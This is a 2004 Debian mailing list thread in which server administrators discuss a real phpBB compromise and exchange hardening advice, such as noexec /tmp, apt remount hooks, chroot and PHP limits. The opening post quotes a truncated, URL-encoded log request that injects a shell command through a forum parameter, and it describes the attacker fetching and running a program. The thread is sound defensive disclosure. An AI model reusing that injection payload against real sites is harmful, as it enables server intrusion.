Re: phpBB vulnerability exploited
Fraser Campbell wrote: On Sunday 12 December 2004 17:46, Marek Podmaka wrote: I don't want to give hints on how to exploit this, but the attacker did wget the .tgz file, unpacked it in /tmp and run the program. So update all your phpBB installations ASAP (and of course all installations of your customers). On a somewhat related note ... I have the habit of mount /tmp with noexec,nosuid,nodev. I also mount /usr and /boot ro. These minor changes can prevent common automated attacks (probably the one you encountered) and don't cause any problems. It can cause probleme with the default invocation of logrotate (Starting with version ... huu ... 7.something.somethingelse, the postrotate script is dumped in a file and executed (before, it was in a system()). But you can quickfix this problem with an export of TMPDIR in the crontab script (of logrotate). Wacquiez Sébastien
Re: phpBB vulnerability exploited
Francesco P. Lovergine said: > I run apache using dchroot to avoid the most common problems. > Breaking a chroot is possible, but not so easy and it's more > difficult within dchroot which _should_ drops privileges properly AFAIK
Re: phpBB vulnerability exploited
Hi Fraser, On Mon, 13 Dec 2004 07:53:38 -0500 Fraser Campbell <[EMAIL PROTECTED]> wrote: > In my case I doubt it since much of postfix lives there. It might be > possible in certain cases though I'm not sure. Maybe you could make 2 partitions: /var mounted noexec and /var/spool/postfix mounted exec Greetings Jerome Vandenabeele -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: phpBB vulnerability exploited
also sprach Jerome Vandenabeele <[EMAIL PROTECTED]> [2004.12.14.1200 +0100]: > Maybe you could make 2 partitions: /var mounted noexec and > /var/spool/postfix mounted exec I hope you are running a 2.6 kernel if you rely on the exec flag. Sorry for barking into this thread, which I have not followed. When I see PHP, I say no. Aren't postinst files also executed from within /var? -- Please do not send copies of list mail to me; I read the list! .''`. martin f. krafft <[EMAIL PROTECTED]> : :' :proud Debian developer, admin, user, and author `. `'` `- Debian - when you have better things to do than fixing a system Invalid/expired PGP subkeys? Use subkeys.pgp.net as keyserver! signature.asc Description: Digital signature
Re: phpBB vulnerability exploited
On Mon, Dec 13, 2004 at 01:44:41PM +0200, Boris Pavlov wrote: > > limit with php opendir. make another tmp directory, and set php temp dir, > with all permissions you want. limit the system function, if you don't need > it. they are a per-vhost apache settings, check the manuals. > I run apache using dchroot to avoid the most common problems. Breaking a chroot is possible, but not so easy and it's more difficult within dchroot which _should_ drops privileges properly AFAIK. I do that commonly for hosting services where users can run their own php and cgi scripts. That cannot avoid creating shells services, surely but avoid password cracking, use of cron, access to kernel modules and log files, and so on. -- Francesco P. Lovergine -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: phpBB vulnerability exploited
On Monday 13 December 2004 03:31, Marek Podmaka wrote:
> Yes, I have been doing the same with /tmp, but some debian packages
> won't install on noexec /tmp. But there are other directorieso n my
> system which are world writable - for example /var/tmp and
> /var/lock.
If you've configured apt to preconfigure packages (at least I think that's the
case) then apt will extract some stuff to /tmp and execute it from there.
The solution I use is to temporarily remount partitions with necessary
permissions during apt's run. I do this automatically with the following
commands in apt's config files:
DPkg::Pre-Install-Pkgs {"mount -o remount,rw /boot";};
DPkg::Pre-Install-Pkgs {"mount -o remount,exec /tmp";};
DPkg::Pre-Install-Pkgs {"mount -o remount,rw /usr";};
DPkg::Post-Invoke {"mount -o remount /boot";};
DPkg::Post-Invoke {"mount -o remount /tmp";};
DPkg::Post-Invoke {"mount -o remount /usr";};
I'd think you can get away with linking /var/tmp to /tmp but /var/lock might
be tricky to get around.
> Can entire /var be mounted noexec?
In my case I doubt it since much of postfix lives there. It might be possible
in certain cases though I'm not sure.
--
Fraser Campbell <[EMAIL PROTECTED]> http://www.wehave.net/
Georgetown, Ontario, Canada Debian GNU/Linux
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: phpBB vulnerability exploited
better look at your php4 settings: limit with php opendir. make another tmp directory, and set php temp dir, with all permissions you want. limit the system function, if you don't need it. they are a per-vhost apache settings, check the manuals. wwell edi Fraser Campbell writes: On Sunday 12 December 2004 17:46, Marek Podmaka wrote: I don't want to give hints on how to exploit this, but the attacker did wget the .tgz file, unpacked it in /tmp and run the program. So update all your phpBB installations ASAP (and of course all installations of your customers). On a somewhat related note ... I have the habit of mount /tmp with noexec,nosuid,nodev. I also mount /usr and /boot ro. These minor changes can prevent common automated attacks (probably the one you encountered) and don't cause any problems. -- Fraser Campbell <[EMAIL PROTECTED]> http://www.wehave.net/ Georgetown, Ontario, Canada Debian GNU/Linux -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Re[2]: phpBB vulnerability exploited
On Mon, 13 Dec 2004, Marek Podmaka wrote: > Yes, I have been doing the same with /tmp, but some debian packages > won't install on noexec /tmp. But there are other directorieso n my > system which are world writable - for example /var/tmp and > /var/lock. If you can make /tmp noexec, you can also make /var/tmp and /var/lock noexec. File wishlist bugs against packages that run stuff in /tmp, request that the maintainer not close it but rather mark it "wontfix" if he doesn't want to fix the bug (so that we can find which packages do not support noexec /tmp). Use a consistent subject for this (e.g.: : does not suport noexec /tmp) > Can entire /var be mounted noexec? No. It will break all chroots, and also dpkg. -- "One disk to rule them all, One disk to find them. One disk to bring them all and in the darkness grind them. In the Land of Redmond where the shadows lie." -- The Silicon Valley Tarot Henrique Holschuh -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re[2]: phpBB vulnerability exploited
Hello Fraser, Yes, I have been doing the same with /tmp, but some debian packages won't install on noexec /tmp. But there are other directorieso n my system which are world writable - for example /var/tmp and /var/lock. Can entire /var be mounted noexec? Monday, December 13, 2004, 4:17:19, you wrote: FC> I have the habit of mount /tmp with noexec,nosuid,nodev. I also mount /usr FC> and /boot ro. These minor changes can prevent common automated attacks FC> (probably the one you encountered) and don't cause any problems. -- bYE, Marki -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: phpBB vulnerability exploited
On Sunday 12 December 2004 17:46, Marek Podmaka wrote: > I don't want to give hints on how to exploit this, but the attacker > did wget the .tgz file, unpacked it in /tmp and run the program. > > So update all your phpBB installations ASAP (and of course all > installations of your customers). On a somewhat related note ... I have the habit of mount /tmp with noexec,nosuid,nodev. I also mount /usr and /boot ro. These minor changes can prevent common automated attacks (probably the one you encountered) and don't cause any problems. -- Fraser Campbell <[EMAIL PROTECTED]> http://www.wehave.net/ Georgetown, Ontario, Canada Debian GNU/Linux
phpBB vulnerability exploited
Hello debian-isp, maybe little off-topic, but I want to remind you of this phpBB vulnerability, which is fixed in version 2.0.11 (announced on 18th November) which "addresses a potentially serious exploit". I am writing this because it's not potentional, but real. Before 2 weeks, someone got into my server and run a program which gave shell access on port 2000 (check your machines). Fortunately it had only apache user prividges, but the person tried to run various exploits. So I was sure the only option to get to my server was php. When I was sure no damage could be done, I leaved everything and set-up 2 traps - one was periodic running of netstat | grep ":2000" and the other was creating world-writable /.bash_history :) Today I was lucky, I have IP address probably of the attacker (some GSM provider in Romania) and IP of another "hacked" server. Searching for that IP in apache logs gave me this: 213.xxx.xxx.xxx - - [11/Dec/2004:04:01:59 +0100] "GET /forum/viewtopic.php?t=%38&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%63%64%20%2F%74%6D%70.. HTTP/1.1" 200 27712 "-" "-" I don't want to give hints on how to exploit this, but the attacker did wget the .tgz file, unpacked it in /tmp and run the program. So update all your phpBB installations ASAP (and of course all installations of your customers). -- bYE, Marki -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
